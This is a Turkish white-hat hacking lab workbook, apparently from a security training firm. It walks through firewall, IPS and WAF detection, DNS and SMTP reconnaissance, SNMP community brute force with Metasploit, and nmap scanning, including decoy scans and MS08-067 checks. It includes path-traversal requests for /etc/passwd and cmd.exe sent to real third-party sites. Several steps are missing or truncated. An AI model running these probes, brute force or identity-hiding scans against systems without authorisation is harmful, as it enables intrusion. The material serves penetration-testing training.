Amaç: Hedef system önünde bizi engelleyen IPS/FW/WAF vb. Güvenlik cihazları olup olmadığını
keşfetme.
Lab senaryosu: Çeşitli istekler ile hedef sistemleri yoklama yapılacaktır. Bazen açık port SYN paketi
gönderilip sonuç gözlemlenecek bazende IPS v.b güvenlik cihazlarının hoşuna gitmeyecek paketler
gönderiliptepkileri görülüpyorumlanacaktır.
KullanılanAraçlar:
● hping
● telnet
● Wafw00f
● Ipsfinder.py
Adımlar:
1.Hpingile güvenlikduvarıbelirleme;
69.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Güvenlik duvarı olmayan bir sistemde açık porta SYN paketi gönderildigind SYN+ACK dönerken kapalı
porta gönderilen SYN paketine RST dönmesi gerekir. Güvenlik duvarı ile korunan sistemlerde genellikle
cevapdönülmez.
Google.com domainin açık olduğunu bildigimiz 80 portuna 1 adet SYN bayrağı set edilmiş TCP paketi
gönderiyoruz.Cevapbeklediğimizgibi SYN/ACK(SA) şeklinde.
root@bt:~# hping3google.com -p80 -S -c 1
HPINGgoogle.com(eth0173.194.35.34): S set, 40 headers+ 0 data bytes
len=46 ip=173.194.35.34 ttl=54 id=39454 sport=80 flags=SA seq=0 win=62920 rtt=92.7 ms
--- google.comhping statistic---
1 packets tramitted,1 packetsreceived, 0% packetloss
round-trip min/avg/max=92.7/92.7/92.7 ms
Aynı hedefin 81 portuna aynı paketi gönderdiğimizde gördügünüz gibi hiç bir cevap dönmemektedir. O
halde sisteminönünde birgüvenlikduvarıolduğunuve bunuengellediğinisöyleyebiliriz.
root@bt:~# hping3google.com -p81 -S -c 1
HPINGgoogle.com(eth0173.194.35.38): S set, 40 headers+ 0 data bytes
--- google.comhping statistic---
1 packetstramitted,0 packetsreceived, 100% packetloss
round-trip min/avg/max=0.0/0.0/0.0 ms
Güvenlik duvarı olmayan sistemlerde RST/ACK(RA) dönecektir. SYN Proxy olan sistemlerde SYN/ACK
dönebilir. Bu durumda detaylı incelemek gerekir. Nmap –sV parametresi ile portun gerçek durumu
anlaşılabilir.
2.Adım: IPS(IntrusionPreventionSystem) saldırıtesbitve engelleme cihazi keşfetme;
Hemen hemen tüm IPS’lerde directory/path traversal zaafiyetine karşı çeşitli imzalar yer almaktadır. Ya
da URL de geçecek /etc/passwd, /bin/sh, cmd.exe gibi stringler IPS’in devreye girmesi ve aksiyon alması
içinyeterlidir.
Örnekler:
#telnet ip_adresi 80
GET ../../../etc/passwdHTTP/1.0
#telnet ip_adresi 80
GET ../../../bin/sh HTTP/1.0
#telnet ip_adresi 80
GET ../../../../cmd.exe HTTP/1.0
70.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
gibi.
Bu istekleri hedef sisteme gönderdiğimizde eğer bağlantı aniden kesiliyorsa (TCP RST) ya da hedef
sisteme olan bağlantınız kesiliyorsa(hedefe gönderdiğiniz paketlere cevap dönmüyorsa) arada koruma
modunda bir IPS(ya da benzeri işlevi yapan bir Firewall özelliği(Checkpoint SmartDefense gibi)) var
demektir.
IPSkoruması olmayanbirsisteme butipHTTP istekleri gönderdiğimizde aşağıdakinabenzerçıktıalırız.
# telnet www.snort.org 80
Trying 68.177.102.20…
Connected to www.snort.org.
Escape character is ‘^]’.
GET ../../../etc/passwdHTTP/1.0
HTTP/1.1 400 Bad Request
Date: Mon, 15 Feb 2010 09:53:42 GMT
Server: Apache
Content-Length: 289
Connection: close
Content-Type:text/html;charset=iso-8859-1
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache Server at www.snort.org Port 80</address>
</body></html>
Connection closed by foreign host.
IPS koruması olduğunu düşündüğümüz bir siteye aynı isteği gönderip tcpdump ile paketleri izlersek nasıl
bir aksiyonaldığınırahatlıkagörebiliriz.
root@bt:~# telnet www.tippingpoint.com 80
Trying 66.179.208.38…
Connected to www.tippingpoint.com
Escape character is ‘^]’.
GET ../../../etc/passwdHTTP/1.0
…
…
71.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Yapılan isteğe herhangi bir cevap dönmüyor, arada bir cihazın engellediğini düşünüyoruz ve tcpdump ile
paketleri izliyoruz.
root@bt:~# tcpdump -i eth0 -ttnn host www.tippingpoint.com-X
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
1266164687.171707 IP 192.168.1.103.33743 > 66.179.208.38.80: S 2292162228:2292162228(0) win
5840 <mss 1460,sackOK,timestamp 5333259 0,nop,wscale 6>
1266164687.186012 IP 66.179.208.38.80 > 192.168.1.103.33743: S 2738042328:2738042328(0) ack
1266164687.186042 IP 192.168.1.103.33743 > 66.179.208.38.80: . ack 1 win 5840
1266164701.117674 IP 192.168.1.103.33743 > 66.179.208.38.80: P 1:35(34) ack 1 win 5840
1266164704.116954 IP 192.168.1.103.33743 > 66.179.208.38.80: P 1:35(34) ack 1 win 5840
0×0000: 4510 004a ffc2 4000 4006 e3a3 c0a8 0167 E..J..@.@……g
0×0010: c21d d30a 83cf 0050 889f 9eb5 a333 35d9 …….P…..35.
0×0020: 5018 16d0 54ae 0000 4745 5420 2e2e 2f2e P…T…GET…/.
0×0030: 2e2f 2e2e 2f65 7463 2f70 6173 7377 6420 ./../etc/passwd.
0×0040: 4854 5450 2f31 2e30 0d0a HTTP/1.0..
1266164710.117343 IP 192.168.1.103.33743 > 66.179.208.38.80: P 1:35(34) ack 1 win 5840
0×0000: 4510 004a ffc3 4000 4006 e3a2 c0a8 0167 E..J..@.@……g
0×0010: c21d d30a 83cf 0050 889f 9eb5 a333 35d9 …….P…..35.
0×0020: 5018 16d0 54ae 0000 4745 5420 2e2e 2f2e P…T…GET…/.
0×0030: 2e2f 2e2e 2f65 7463 2f70 6173 7377 6420 ./../etc/passwd.
0×0040: 4854 5450 2f31 2e30 0d0a HTTP/1.0..
1266164722.117149 IP 192.168.1.103.33743 > 66.179.208.38.80: P 1:35(34) ack 1 win 5840
0×0000: 4510 004a ffc4 4000 4006 e3a1 c0a8 0167 E..J..@.@……g
0×0010: c21d d30a 83cf 0050 889f 9eb5 a333 35d9 …….P…..35.
0×0020: 5018 16d0 54ae 0000 4745 5420 2e2e 2f2e P…T…GET…/.
0×0030: 2e2f 2e2e 2f65 7463 2f70 6173 7377 6420 ./../etc/passwd.
0×0040: 4854 5450 2f31 2e30 0d0a HTTP/1.0..
Tcpdump çıktısından anlaşılacağı gibi hedef system gönderdiğimiz HTTP istekleri karşılık bulmuyor. Çünki
aradaki IPS bupaketleri zararlıolarakişaretleyip sessize bloklamaktadır.
3.Wafw00f.py scripti ile WAF(WebApplicationFirewall) keşfi;
Bir WAFüreticisi olanimperva’nınwebsitesininbirWAFcihazıarkasında olabileceğini tahminediyoruz.
root@bt:/pentest/web/waffit#pythonwafw00f.pyhttp://www.imperva.com
^ ^
_ __ _ ____ _ __ _ _ ____
///7/ /.' / __////7//,' ,' / __/
| V V // o // _/ | V V // 0 //0 // _/
|_n_,'/_n_//_/ |_n_,' _,' _,'/_/
<
...'
72.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
WAFW00F - Web Application Firewall Detection Tool
By Sandro Gauci&& Wendel G. Henrique
Checking http://www.imperva.com
WARNING:wafw00f:Hey..they closedour connection!
WARNING:wafw00f:Hey..they closed ourconnection!
Generic Detection results:
WARNING:wafw00f:Hey..they closed our connection!
The site http://www.imperva.comseemstobe behinda WAF
Reason:Blocking is being doneatconnection/packetlevel.
Numberof requests:10
Evetgörüldüğügibi birWAFsistemi ile korunduklarındandolayıgönderilenisteklerkapatılıyor.
Aşağıda da WAFkoruması olmayanbirwebuygulamasınıtestettik.
root@bt:/pentest/web/waffit#pythonwafw00f.pyhttp://testasp.vulnweb.com/
^ ^
_ __ _ ____ _ __ _ _ ____
///7/ /.' / __////7//,' ,' / __/
| V V // o // _/ | V V // 0 //0 // _/
|_n_,'/_n_//_/ |_n_,' _,' _,'/_/
<
...'
WAFW00F - Web Application Firewall Detection Tool
By Sandro Gauci&& Wendel G. Henrique
Checking http://testasp.vulnweb.com/
Generic Detection results:
No WAF detected by thegeneric detection
Numberof requests:10
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-10
73.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Uygulama Adı: DNS Protokolü Üzerinden Bilgi Toplama
Amaç: Dnsservisi üzerindenbilgi toplama( a,mx ve ns kayıtları )
Lab senaryosu:
Bu uygulama internet erişimine sahip backtrack Linux dağıtımı kullanılarak hazırlanmıştır. Örnek bir
kurumaait DNSüzerindenhangi tipbilgilerinelde edilebileceği gösterilmiştir.
KullanılanAraçlar:
dig
nslookup
Adımlar:
1. Adım:Dig ile hedefeaitName Server(NS) kayıtlarınıöğrenmek.
2. Adım:Dig ile A kaydı sorgulama:
3. Dig ile mail exchange server(MX) kaydısorgulama
74.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Nslookupile A kayıdısorgulama
5. Adım: Nslookup ile hedef port 53(-port=53) olacak şekilde ve detaylarınıda görebileceğimiz şekilde(-
debug) NS kayıdı sorgulama
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
7. Adım:Online olarakA,MX,NSgibi kayıtlarısorgulayabileceginizwebtoolhup.comsitesi kullanılabilir.
---
UygulamaNo:BGA-PT-11
Uygulama Adı: DNS Zone Transferi Kontrolü
Amaç: Dns serverlar üzerinde zone transfer açıklığını exploit ederek system üzerinde bulunan tüm
subdomainleri ve IPadreslerini elegeçirme.
KullanılanAraçlar:
dig
nslookup
Adımlar:
1. Adım:Dig ile DNSzone transferyapma
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Uygulama No: BGA-PT-12
Uygulama Adı: DNS Sunucu version bilgisi bulma
Amaç: DNS server yapıalacak saldırı öncesinde bu sunucularda kullanılan DNS uygulamasına ait versiyon
bilgisiniele geçirme.
KullanılanAraçlar:
dig
nslookup
nmap
Adımlar:
79.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
1.Adım : Dig ile DNSversiyonbilgisi öğrenme
2. Adım:Nslookupile DNSversiyonbilgisiöğrenme
3. Adım:Nmap ile DNSversiyonöğrenme;
---
Uygulama No:BGA-PT-13
Uygulama Adı: SMTP Üzerinden İç Ağ IP Yapısının Belirlenmesi
Amaç:
KullanılanAraçlar:
Adımlar:
80.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
1.Adım: Hedef sistemde olmadığını bildiğimiz bir email adresine email gönderiyoruz ve bize böyle bir
mail olmadığınadair cevapdönmesinibekliyoruz.
2.Adım: Beklediğimizcevapmailbox’ımızadüşmüştür.
Gelen maile ait başlık bilgilerini görebilmek için gmail üzerinden aşağıda gösterildiği gibi orjinali göster
bağlantısını seçiyoruz.
3.Adım: Aşağıdaki gibi dönen mail için başlık bilgisi incelendiğinde mailimizin 172.24.23.10 IP adresinden
121.14.21.23 IP adresine doğru yol aldığı görülmektedir. Mail dönen mail olduğundan dolayı tersten yolu
izlediğimizde mail sunucunun iç networke bakan interface IP adresi 172.24.23.10 şeklindedir. Bu da iç
81.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
networkte 172.24.23.0/24 benzeri bir subnet kullanıldığını bize göstermektedir. 121.14.21.0/24 subneti
ise dış bakantaraf içinkullanılansubnettir.
Not: /24 subnet maskı yalnızca subneti ifade için kullanılmıştır. Firma bunu /25 veya /26 şeklinde de
kullanmışolabilir.
4.Adım: Mail başlık bilgilerinin daha görsel bir şekilde analiz edilmesi için
http://www.mxtoolbox.com/EmailHeaders.aspxadreside kullanılabilir.
82.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
---
Uygulama No:BGA-PT-14
Uygulama Adı: SNMP Üzerinden Bilgi Toplama
Amaç: SNMPservisi açıkolan sistemlerdenbilgitoplama
KullanılanAraçlar:
Nmap
Metasploit
Solarwinds
Snmpenum
Adımlar:
1. Adım : SNMP UDP 161 portunu kullandığı için hedef sistemde öncelikle bu portun açık olup olmadığını
nmapile bu portayönelikversiyontaramaile taramayapıyoruz.
sh-3.2# nmap 192.168.5.9 -p 161 -sU -sV
Starting Nmap 6.01 ( http://nmap.org ) at2012-12-01 15:48 EET
Nmap scan reportfor(192.168.5.9)
Host is up (0.29s latency).
PORT STATE SERVICEVERSION
161/udp open snmp SNMPv1server(public)
Service Info:Host:r3.ca.smt
83.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Service detection performed.Pleasereportany incorrect resultsat http://nmap.org/submit/.
Nmap done:1 IP address(1hostup) scanned in 4.57 seconds
2. Adım : Metasploit ile SNMP protokolünde kullanılan haberleşme kelimesini(community word) tesbit
etmekiçinbrute force işlemi yapalım;
root@bt:~# msfconsole
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) >showoptions
Moduleoptions(auxiliary/scanner/snmp/snmp_login):
Name CurrentSetting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each
set
BLANK_PASSWORDS true no Try blank passwords for all
users
BRUTEFORCE_SPEED 5 yes How fastto bruteforce,from0 to 5
CHOST no The local client address
PASSWORD no The password to test
PASS_FILE /opt/metasploit/msf3/data/wordlists/snmp_default_pass.txt no File containing
communities,oneper line
RHOSTS yes The targetaddressrangeor CIDRidentifier
RPORT 161 yes The targetport
STOP_ON_SUCCESS false yes Stop guessing when a credential works
fora host
THREADS 1 yes The numberof concurrentthreads
USER_AS_PASS true no Try the username as the
password forallusers
VERBOSE true yes Whetherto print outputforall attempts
msf auxiliary(snmp_login) >set RHOSTS 192.168.5.9
RHOSTS=> 192.168.5.9
msf auxiliary(snmp_login) >exploit
[*] :161SNMP - [001/118] - 192.168.5.9:161 - SNMP - Trying public...
[*] :161SNMP - [002/118] - 192.168.5.9:161 - SNMP - Trying private...
[*] :161SNMP - [003/118] - 192.168.5.9:161 - SNMP - Trying 0...
[*] :161SNMP - [011/118] - 192.168.5.9:161 - SNMP - Trying CISCO...
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
---
UygulamaNo:BGA-PT-15
Uygulama Adı: Nmap Kullanarak Açık Sistemlerin Belirlenmesi
Amaç: Çeşitli methodalar (ARping, UDPing, TCPing) kullanarak hedef sistemlerin ayakta olup olmadığının
belirlenmesi.
KullanılanAraçlar:
● Nmap
Adımlar:
1.Adım: Hedef sistemin(cnn.com) 21 portuna TCP SYN paketi göndererek hedefin ayakta olup olmadığını
görelim.Hedef sistemin 21 portuna erişim olmadığı için hedefin down olduğunu görmemiz
beklenmektedir.
root@pentest09:/home/celal#nmap -sP-PS21 cnn.com
Starting Nmap 6.01 ( http://nmap.org ) at2012-12-09 01:46 EET
Note:Host seems down. If it is really up,butblocking ourping probes,try -Pn
Nmap done:1 IP address(0hostsup) scanned in 2.09 seconds
2.Adım: Hedef sistemin(cnn.com) 80 portuna TCP SYN paketi göndererek hedefin ayakta olup olmadığını
görelim.Hedefsistemin80portunaerişimolduğuiçinhedefinupolduğunugörmemizbeklenmektedir.
root@pentest09:/home/celal#nmap -sP-PS80 cnn.com
Starting Nmap 6.01 ( http://nmap.org ) at2012-12-09 01:46 EET
Nmap scan reportforcnn.com(157.166.255.19)
Host is up (0.26s latency).
Otheraddressesforcnn.com(notscanned):157.166.226.25 157.166.226.26 157.166.255.18
Nmap done:1 IP address(1hostup) scanned in 0.50 seconds
3.Adım: Hedef sistemin(cnn.com) 22 portuna TCP ACK paketi göndererek hedefin ayakta olup olmadığını
görelim.Hedef sistemin 22 portuna erişim olmadığı için hedefin down olduğunu görmemiz
beklenmektedir.
90.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
root@pentest09:/home/celal#nmap -sP-PA22 cnn.com
Starting Nmap 6.01 ( http://nmap.org ) at2012-12-09 01:49 EET
Note:Host seems down. If it is really up,butblocking ourping probes,try -Pn
Nmap done:1 IP address(0hostsup) scanned in 2.09 seconds
4.Adım: Hedef sistemin(cnn.com) 80 portuna TCP ACK paketi göndererek hedefin ayakta olup olmadığını
görelim.Hedef sistemin 80 portuna erişim olduğu ve ACK paketlerine cevap verdiği için hedefin up
olduğunugörmemizbeklenmektedir.
root@pentest09:/home/celal#nmap -sP-PA80 cnn.com
Starting Nmap 6.01 ( http://nmap.org ) at2012-12-09 01:51 EET
Nmap scan reportforcnn.com(157.166.226.26)
Host is up (0.24s latency).
Otheraddressesforcnn.com(notscanned):157.166.255.18 157.166.255.19 157.166.226.25
rDNSrecord for157.166.226.26: www.cnn.com
Nmap done:1 IP address(1hostup) scanned in 0.40 seconds
5.Adım: UDP ping genelde sistemin ayakta olup olmadığını tesbit etmede başarılı değildir. Tercih edilmez.
UDP pingiçinilgili nmapparametresi -PUşeklindedir.
Ek Kaynaklar:
www.insecure.org
UygulamaNo:BGA-PT-16
Uygulama Adı: Nmap Kullanarak TCP/UDP Port Tarama
Amaç: Hedef sistemlerüzerindeki portlarındurumlarını(open,closed,filtered) öğrenme.
KullanılanAraçlar:
Adımlar:
1. Adım:Nmap kullanarakbga.com.trsitesininTCP21,80,443 portlarını tarayalım;
91.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
-sSparameteresi hedefeTCPSynscan yapılacağını gösterir.
2. Adım:Nmap kullanarak8.8.8.8 IPadresininUDP53 portunutarayalım
Port durumunun açık mı filtred mi olduğundan emin olamadığı için open|filtered döndü.Biz emin olmak
için-sV komutuile çalıştırıyoruz.
Portunaçık olduğundaneminolduk.
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-17
Uygulama Adı: Nmap Kullanarak Çalışan Servis Sürümlerini Belirleme
Amaç: Açık olanportukullananservisinismini ve sürümünütesbitetme
92.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
KullanılanAraçlar:
Nmap
Adımlar:
1. Adım:Nmap kullanılarakgoogle.comdomaininTCP/80portundaçalışanservisi belirleyelim.
Görüldüğü gibi google web server olarak kendisine ait olan Google httpd kullanıyor. Ve kullandığı
versiyonu 2.0’dır. -sV parametresi ile açık bulunan portlarda çalışan servis bilgisi ve versiyonu
öğrenilebilir.
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-18
Uygulama Adı: Nmap Kullanarak Belirli IP aralığındaki belirli Port Aralığını Tarama
Amaç: Sadece belli IPadreslerininistediğimizbelli portlarınaaittaramalaryapıpsonuçlarını gözlemleme
KullanılanAraçlar:
Nmap
Adımlar:
1. Adım: Aşağıdaki çıktıdaki IP adresinin 1 ile 3389 arasındaki TCP portlarını tarayalım.Nmap ön tanımlı
olarak taramaya geçmeden önce hedefin ayakta olup olmadığını tesbit etmek için ping scan işlemi
yapar.Bunuiptal etmekiçin -PN parametresini kullandık.
93.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2. Adım:Tüm portları taramak için -p- veya-p1-65536 şeklinde kullanılabilir.
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-19
Uygulama Adı: Sahte IP/Tuzak Sistemler Kullanarak Port Tarama
Amaç: Kimliğimizi gizleyerekhedef systemüzerindetaramlargerçekleştirme
KullanılanAraçlar:
Nmap
Adımlar:
1.Adım: Nmap aracı kullanılarak bir sahte IP havuzu oluşturulacaktır.Kendi IP adresimizde bu havuzda
yer alacaktır.Havuz istenilen IP’lerden veya random seçilecek IP adreslerinden oluşabilir. Bu havuzdaki IP
adreslerinden hedefe yönelik aynı anda porta taraması yapılacaktır.Bu şekilde hedef sistem şaşırtılacaktır.
İstenilenIPadresleriile hedefe yönelikporttaraması(-DIP1,IP2,IP3...):
94.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Aynı anda tcpdump ile oluşan trafiği inceleyecek olursak input olarak verdiğimiz kaynak IP adreslerinden
hedefe doğruSYN(S) paketleri setedilmişTCPpaketleriningittiği görülebilecektir;
2. Adım: Random IP adresleri ile bir 10 IP adresine sahip havuz oluşturup bu havuz IP adresleri ile hedefe
yönelikporttaramasıyapalım;
Sonuçlarınıtcpdumpile izleyelim;
---
95.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
UygulamaNo:BGA-PT-20
Uygulama Adı: Nmap NSE Kullanarak güvenlik açığı tesbit etme
Amaç: Bulunanaçık portlardaki güvenlikzafiyetlerininbelirlenmesi.
KullanılanAraçlar:
NmapNSE
Adımlar:
1. Adım: Nmap Script Enginee(NSE) kullanarak FTP hizmetinin Anonymous kullanıcısının parolası boş ise
bunutesbitedelim.
root@bt:/usr/local/share/nmap/scripts#nmap10.10.15.12 -p 21 --script=ftp-anon-PN-n
Starting Nmap 6.00 ( http://nmap.org ) at2012-11-10 21:56 EET
Nmap scan reportfor10.10.15.12
Host is up (0.0048s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon:AnonymousFTPloginallowed(FTPcode 230)
|_drwxr-xr-x 2 0 0 4096 Mar 10 2011 pub
Nmap done:1 IP address(1hostup) scanned in 0.13 seconds
Tüm NSE scriptlerinigörmekiçin/usr/local/share/nmap/scripts dizinine bakabilirsiniz.
2. Adım: NSE kullanarak belli bir IP aralığındaki MS08-067 açıklığı ve Conficker virüsüne sahip sunucuları
bulalım.Butaramayısmb-check-vulns.nseisimli scriptile
root@bt:~# nmap6.6.6.90-99 --script=smb-check-vulns-PN-p139,445 -n
Starting Nmap 6.01 ( http://nmap.org ) at2012-11-29 09:32 EET
Nmap scan reportfor6.6.6.97
Host is up (0.0057s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MACAddress:00:0C:29:6E:1B:8F (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker:Likely CLEAN
| regsvcDoS:CHECK DISABLED(add '--script-args=unsafe=1'to run)
96.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
| SMBv2DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1'to run)
| MS06-025: CHECKDISABLED (remove'safe=1' argumentto run)
|_ MS07-029: CHECKDISABLED (remove'safe=1' argumentto run)
Nmap done:10 IPaddresses(5hostsup) scanned in 0.80 seconds
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-21
Uygulama Adı: SYN Proxy Kullanılan Sistemlere Yönelik Port Tarama
Amaç: SYN proxy kullanımından dolayı saldırganlara karşı alınmış önlemleri atlatarak hazırlanmış
aldatmacayıdüzenli birşekilde atlatma.
KullanılanAraçlar:
Nmap
Adımlar:
1. Adım: SYN Proxy kullanan hedefe yönelik port taramasında SYN Proxy’lik yapan cihaz her gönderilen
SYN bayrağı setedilmişTCPpaketineSYN+ACKdöneceğindentümportlaraçık görünür;
root@bt:/usr/local/share/nmap/scripts#nmap10.10.10.5 -p 78-82
Starting Nmap 6.00 ( http://nmap.org ) at2012-11-10 22:20 EET
Nmap scan reportfor10.10.10.5
Host is up (0.0091s latency).
PORT STATE SERVICE
78/tcp open unknown
79/tcp open finger
80/tcp open http
81/tcp open hosts2-ns
82/tcp open xfer
2. Adım: SYN proxy kullanan sistemlerde hangi portların gerçekte açık olduğunu tesbit etmek için
nmap’in-sV komutuile portlardaçalışanservistesbitininyapılmasıgerekmektedir.
97.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
root@bt:/usr/local/share/nmap/scripts#nmap10.10.10.5 -p 78-82 -sV
Nmapscan reportfor 10.10.10.5
Host isup (0.0087s latency).
PORT STATE SERVICE VERSION
78/tcp open unknown
79/tcp open finger?
80/tcp open http MicrosoftHTTPAPI httpd 2.0 (SSDP/UPnP)
81/tcp open hosts2-ns?
82/tcp open xfer?
Görüldüğü gibi port taraması yaptığımız aralıkta gerçekte yalnızca 80 portunun açık olduğunu
görebilirsiniz.
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-22
Uygulama Adı: Nmap Kullanarak İşletim Sistemi Belirleme
Amaç: Hedef systemüzerinde çalışanişletimsistemini tespitetmek.
KullanılanAraçlar:
Nmap
Adımlar:
1. Adım: Nmap -O parametresi ile uzak sistemde çalışan işletim sistemini tesbit edelim.Nmap işletim
sistemini tesbit işleminde 1 açık port 1 kapalı port bulduğu durumlarda en sağlıklı bilgi verir.Aksi
durumdakendi işletimsistemini ekranabasar.
root@bt:~# nmap10.10.10.5 -O -n
Starting Nmap 6.00 ( http://nmap.org ) at2012-11-10 22:32 EET
Nmap scan reportfor85.95.238.171
Host is up (0.00014s latency).
Notshown:994 closed ports
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
1027/tcp open IIS
1029/tcp open ms-lsa
98.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
MACAddress:00:0C:29:3A:AE:DD (VMware)
Device type: generalpurpose
Running:MicrosoftWindows2003
OS CPE:cpe:/o:microsoft:windows_server_2003::sp1cpe:/o:microsoft:windows_server_2003::sp2
OS details:MicrosoftWindowsServer2003 SP1 or SP2
NetworkDistance:1 hop
OS detection performed.Pleasereportany incorrectresults at http://nmap.org/submit/.
Nmap done:1 IP address(1hostup) scanned in 2.81 seconds
Nmap hedef sistemin işletim sistemini belirlerken öncelikle system üzerinde bir açık bir kapalı port
bulması gerekir. Aksi halde sağlıklı sonuç bulamayabilir. Açık ve kapalı porta gönderdiği paketlere
dönülencevaplardaki TTLdeğerlerindenhedef sistemitespiteder.
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-23
Uygulama Adı: Nmap GUI/Zenmap Kullanarak Port Tarama
Amaç: Hedef sisteminüzerindeaçıkolanportları birgrafikarabirimkullanaraktaramak.
KullanılanAraçlar:
Zenmap
Adımlar:
1. Adım:Zenmapzorlukderecesine göre çeşitli taramatürlerinihazırolarakyapısında barındırmaktadır.
2. Adım:Quickscan kullanarakfacebook.comdomainadresininportlarınıtarayalım.
99.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3. Adım: 6.6.6.0/24 subnetindeki cihazların en popüler 5 portunu zenmap ile tarayalım.En popüler
portları taramak için --top-portsparametresini kullanıyoruz.
Ek Kaynaklar:
100.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
---
UygulamaNo:BGA-PT-24
Uygulama Adı: Nmap NSE ile SMB Dosya paylaşımlarını tespit etmek
Amaç: Hedef ağdaki tüm sistemlerin üzerinde genele açık paylaşım dosyalarını tesbit etmek, hassas
verilere ulaşmak
Lab senaryosu:
Bu uygulamainterneterişiminesahipbacktrackLinux dağıtımıkullanılarakhazırlanmıştır.
KullanılanAraçlar:
Nmap
Adımlar:
1. Adım:6.6.6.90-99 IP aralığındaki sistemlere yöneliksmbpaylaşımtaramasıyapalım;
root@bt:~# nmap6.6.6.90-99 --script=smb-enum-shares-PN-p139,445 -n
Starting Nmap 6.01 ( http://nmap.org ) at2012-11-29 10:28 EET
Nmap scan reportfor6.6.6.97
Host is up (0.016s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MACAddress:00:0C:29:6E:1B:8F (VMware)
Host script results:
